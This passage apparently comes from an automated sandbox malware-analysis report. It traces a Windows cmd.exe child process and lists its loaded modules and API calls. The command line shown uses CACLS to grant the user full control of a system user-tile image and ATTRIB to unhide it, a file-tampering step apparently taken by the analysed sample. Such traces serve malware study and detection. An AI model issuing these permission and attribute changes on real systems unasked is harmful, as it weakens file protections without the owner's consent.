0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28012 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28013 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28014 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28015 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28016 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28017 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28018 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28019 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28020 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28021 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28022 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 28023 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28024 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 604 os_tid = 0xb48 Process: id = "426" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x8f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28025 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28026 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28027 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28028 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28029 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28030 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28031 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28032 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28033 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28034 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28035 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28036 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28037 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28038 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28039 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 28040 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28041 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28042 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28043 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28044 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28045 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28046 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28047 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28048 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28049 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 28050 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28051 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28052 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28053 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 28054 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 28055 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 28056 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 28057 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 28058 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 28059 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 609 os_tid = 0x8f0 [0191.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf9d4 | out: lpSystemTimeAsFileTime=0x1cf9d4*(dwLowDateTime=0xa6edec00, dwHighDateTime=0x1d440a9)) [0191.310] GetCurrentProcessId () returned 0x8f8 [0191.311] GetCurrentThreadId () returned 0x8f0 [0191.311] GetTickCount () returned 0x3673a [0191.311] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf9cc | out: lpPerformanceCount=0x1cf9cc*=24809990976) returned 1 [0191.311] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0191.311] __set_app_type (_Type=0x1) [0191.311] __p__fmode () returned 0x76b331f4 [0191.311] __p__commode () returned 0x76b331fc [0191.311] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0191.312] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0191.312] GetCurrentThreadId () returned 0x8f0 [0191.312] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8f0) returned 0x38 [0191.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.312] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0191.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.312] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0191.312] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf964 | out: phkResult=0x1cf964*=0x0) returned 0x2 [0191.312] VirtualQuery (in: lpAddress=0x1cf99b, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.312] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0191.312] GetConsoleOutputCP () returned 0x1b5 [0191.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.313] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0191.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.313] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0191.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.313] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.313] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.313] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.313] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.313] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0191.313] GetEnvironmentStringsW () returned 0x280308* [0191.314] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.314] GetEnvironmentStringsW () returned 0x280308* [0191.314] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0xb8, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegCloseKey (hKey=0x40) returned 0x0 [0191.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0191.314] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0191.314] RegCloseKey (hKey=0x40) returned 0x0 [0191.315] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886399 [0191.315] srand (_Seed=0x5b886399) [0191.315] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" [0191.315] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" [0191.315] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.315] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0191.315] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.315] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.315] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.315] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0191.315] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0191.315] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0191.315] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0191.315] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0191.315] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0191.315] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0191.315] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0191.315] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0191.316] GetEnvironmentStringsW () returned 0x282458* [0191.316] FreeEnvironmentStringsW (penv=0x282458) returned 1 [0191.316] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.316] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.316] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0191.316] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0191.316] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0191.316] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0191.316] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0191.316] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0191.316] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0191.316] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0191.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf6a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.316] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf6a0, lpFilePart=0x1cf69c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf69c*="Desktop") returned 0x18 [0191.316] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.316] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x280ae8 [0191.316] FindClose (in: hFindFile=0x280ae8 | out: hFindFile=0x280ae8) returned 1 [0191.317] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x280ae8 [0191.317] FindClose (in: hFindFile=0x280ae8 | out: hFindFile=0x280ae8) returned 1 [0191.317] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x280ae8 [0191.317] FindClose (in: hFindFile=0x280ae8 | out: hFindFile=0x280ae8) returned 1 [0191.317] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.317] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0191.317] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0191.317] GetEnvironmentStringsW () returned 0x280308* [0191.317] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.317] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.318] GetConsoleOutputCP () returned 0x1b5 [0191.318] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.318] GetUserDefaultLCID () returned 0x409 [0191.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="1") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0191.319] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0191.319] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0191.320] GetConsoleTitleW (in: lpConsoleTitle=0x2709b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.320] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0191.320] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0191.320] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0191.321] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0191.321] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0191.321] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0191.321] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0191.321] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0191.321] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0191.321] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0191.321] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0191.324] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0191.324] _wcsicmp 